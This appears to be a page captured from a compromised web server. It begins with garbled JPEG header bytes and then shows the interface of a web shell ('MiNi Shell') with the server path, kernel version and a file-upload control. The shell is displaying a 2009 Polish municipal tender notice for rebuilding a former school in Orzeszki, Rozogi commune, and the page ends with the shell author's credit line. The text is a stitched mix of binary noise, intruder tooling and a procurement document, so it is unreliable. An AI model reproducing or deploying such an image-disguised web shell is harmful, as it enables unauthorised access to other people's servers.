JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090915/318964-N-2009.html

<p class="kh_header"><b>Rozogi: Przebudowa budynku byłej Szkoły Podstawowej w Orzeszkach gmina Rozogi z przystosowaniem na Środowiskowy Dom Samopomocy - Etap VIII.</b><br>
<b>Numer ogłoszenia: 318964 - 2009; data zamieszczenia: 15.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rozogi , ul. 22 Lipca 22, 12-114 Rozogi, woj. warmińsko-mazurskie, tel. 089 7226002, faks 089 7226055.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rozogi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku byłej Szkoły Podstawowej w Orzeszkach gmina Rozogi z przystosowaniem na Środowiskowy Dom Samopomocy - Etap VIII..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy:
I. Roboty budowlane wykończeniowe
1. wewnętrzne
1.1. tynki i okładziny ścienne na parterze oraz w części nie podpiwniczonej na piętrze wraz z klatką schodową K2 (zabezpieczenie płytami o klasie odporności ogniowej EI60),
1.2. sufity na parterze oraz w części nie podpiwniczonej na piętrze z płyt o klasie odporności ogniowej EI60,
1.3. podokienniki z materiału drewnopochodnego ruszcie metalowym na parterze i w  części nie podpiwniczonej na piętrze,
1.4. stolarka drzwiowa i okienna: 
1.4.1 stolarka drzwiowa - kolor jasny orzech: 
- drzwi płytowe gładkie D9w (90x2005) - 4 szt. (P), 
- drzwi łazienkowe D8w (80x2055)- 3 szt. (L-1 szt; P-2 szt.), 
- drzwi płytowe pełne gładkie z samozamykaniem D9ws (90x2005) - 2 szt.  
      (L-1 szt.; P-1 szt.), 
- drzwi przesuwane ręcznie P1 (100x200) - 1 szt., 
- drzwi przeciwpożarowe DP9 (90x2005)- 8 szt. (L-4 szt.; P-4 szt.,), 
- drzwi przeciwpożarowe drewniane DP12 (120x205) - 1 szt. (P), 
- drzwi przecipożarowe aluminiowe przeszklone DP15 (150x205) - 2 szt. (P), 
1.4.2. stolarka okienna: 
- okna oddymiające z elektronicznym układem sterowania dla klatek   
schodowych - 2 szt. (72x80), 
1.5. wylewki samopoziomujące posadzek (parter i piętro w części nie podpiwniczonej),
1.6. posadzki gresowe i z wykładziny z tworzyw sztucznych (parter i piętro w części nie podpiwniczonej),
1.7. roboty malarskie oraz lakierowanie powierzchni drewnianych (parter i piętro w części nie podpiwniczonej),
1.8. platformy pionowe dla osób niepełnosprawnych - 2 szt.
1.9. dźwig platformy dla osób niepełnosprawnych - 1 szt..
1.10. pochwyty dla osób niepełnosprawnych w pomieszczeniu sanitarnym,
1.11. ocieplenie stropu poddasza w części nie podpiwniczonej (suchy jastrych, styropian gr. 13 cm, paroizolacja).
2. zewnętrzne
2.1. podjazd dla osób niepełnosprawnych,
2.2. schody od strony frontowej (główne wejście) z wyrównaniem i podniesieniem do poziomu  -0,02 podcienia,
2.3 zjazd z drogi z parkingiem (6 stanowisk) - ok. 280 m2 (kostka betonowa i krawężniki - materiał inwestora),
2.4. chodnik z kostki betonowej od strony frontowej  - ok. 55 m2  (kostka betonowa i obrzeża betonowe - materiał inwestora),

II. Roboty sanitarne (wewnętrzne):
1. montaż grzejników PURMO z głowicą termostatyczną - 39 szt. do wykonanej instalacji c.o. (materiał inwestora - grzejniki)
2. wykonanie wentylacji mechanicznej,
3. biały montaż na wykonanej instalacji wod. - kan., w tym:
- baterie umywalkowe ścienne - 6 szt.
- baterie zmywakowe ścienne - 3 szt.
- bateria natryskowa przesuwana - 1 szt.,
- umywalka pojedyncza porcelanowa z syfonem gruszkowym - 6 kpl.
- zlewozmywak z blachy 2 komorowy - 2 szt.,
- syfon z tworzyw sztucznych podwójny - 2 szt.,
- pisuar pojedynczy z zaworem spłukującym - 1 kpl.,
- ustęp z płuczką typ kompakt - 3 kpl.,
- brodzik natryskowy - 1 kpl.,
- uchwyty dla niepełnosprawnych w toaletach - 1 kpl

III. Roboty elektryczne
1. Instalacja gniazd wtyczkowych do wykonanej instalacji przewodowej (bez kotłowni olejowej),
2. wykonanie instalacji oświetlenia (bez kotłowni),
3. wykonanie instalacji LAN, komputerowej i Telefonicznej,
4. wykonanie instalacji odgromowej,
5. wykonanie instalacji dźwigu i instalacji wykrywania pożaru.

W/w zakres zamówienia wykonać należy zgodnie z dokumentacją techniczną, SIWZ, Specyfikacją Techniczną, pozwoleniem na budowę i uzgodnieniami..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 10.000 zł należy wnieść przed terminem składania ofert w formie zgodnej z art. 45 ust. 6 ustawy - Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1.	posiadają uprawnienia do wykonywania okreś1onej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień;
2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4.	nie pod1egają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych
Oceny spełnienia warunków Zamawiający dokona poprzez sprawdzenie odpowiednich 
dokumentów/ oświadczeń potwierdzających spełnienie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> DOKUMENTY POTWIERDZAJĄCE O NIE WYKLUCZENIU Z POSTĘPOWANIA.

Wykonawca ubiegający się o zamówienie musi załączyć do oferty następujące dokumenty /oświadczenia:
1.	dowód wpłacenia /wniesienia w terminie wadium w wysokości określonej przez Zamawiającego,
2.	oświadczenie o spełnieniu warunków na podstawie art. 22 ust. 1 ustawy - Prawo zamówień publicznych oraz że nie podlega on wykluczeniu z postępowania     o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych - (wzór zał. nr 2),
3.	upoważnienie do podpisania oferty o ile nie wynika ono z innych dokumentów,
4.	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego właściwego dla siedziby wykonawcy o nie zaleganiu z podatkiem związanym z działalnością wykonawcy wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
5.	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych  lub Kasy Rolniczego Ubezpieczenia Społecznego o nie zaleganiu ze składkami na ubezpieczenie zdrowotne i społeczne wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
6.	aktualna informacja o osobie z Krajowego Rejestru Karnego / jeśli dotyczy to również o podmiocie zbiorowym/ wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

DOKUMENTY POTWIERDZAJĄCE SPEŁNIENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU.

1.	Dokumenty potwierdzające posiadanie uprawnień do wykonywania określonej działalności lub czynności:
1)	aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Dokumenty potwierdzające wiarygodność finansową, ekonomiczną, techniczną, kadrową i doświadczenie wykonawcy:
1)	sprawozdania finansowego albo jego części, a jeżeli podlega on badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią         o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
2)	informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdo1ność kredytową wykonawcy, wystawionej nie wcześniej niż  3 miesiące przed upływem terminu składania ofert,
3)	polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
4)	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem              i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (listy referencyjne, protokoły odbioru) - (wzór zał. nr 3), 
5)	wykaz niezbędnego do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca wynikających z technologii robót       i Specyfikacji Technicznej - (wzór zał. nr 4),   
6)	pisemnego zobowiązania innych podmiotów, do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w pkt. 5, wykonawca wskazał narzędzia i urządzenia , którymi będzie dysponował,  
7)	informacja na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie - (wzór zał. nr 5),
8)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonanych przez nich czynności -  (wzór zał. nr 6),
9)	pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie , którym mowa w pkt. 8, wykonawca wskazał osoby, którymi będzie dysponował,
10)	stwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
11)	dane dotyczące podwykonawców i zakresu powierzonych im części zamówienia, jeśli wykonawca przewiduje wykorzystanie podwykonawców. Należy wówczas dołączyć oświadczenie podwykonawcy o współpracy z wykonawcą -       (wzór zał. nr 7).

POZOSTAŁE DOKUMENTY WYMAGANE PRZEZ ZAMAWIAJĄCEGO:  

1.	Formularz ofertowy - (wzór zał. nr 1).
2.	Harmonogram rzeczowo - finansowy realizacji zamówienia zgodnie z zakresem zamówienia - (wzór zał. nr 8)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin wykonania - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://rozogi-ug.bip-wm.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rozogi, ul. 22 Lipca 22, 12-114 Rozogi.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2009 godzina 09:00, miejsce: Urząd Gminy Rozogi, ul. 22 Lipca 22, 12-114 Rozogi, pok. nr. 12 (sekretariat)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com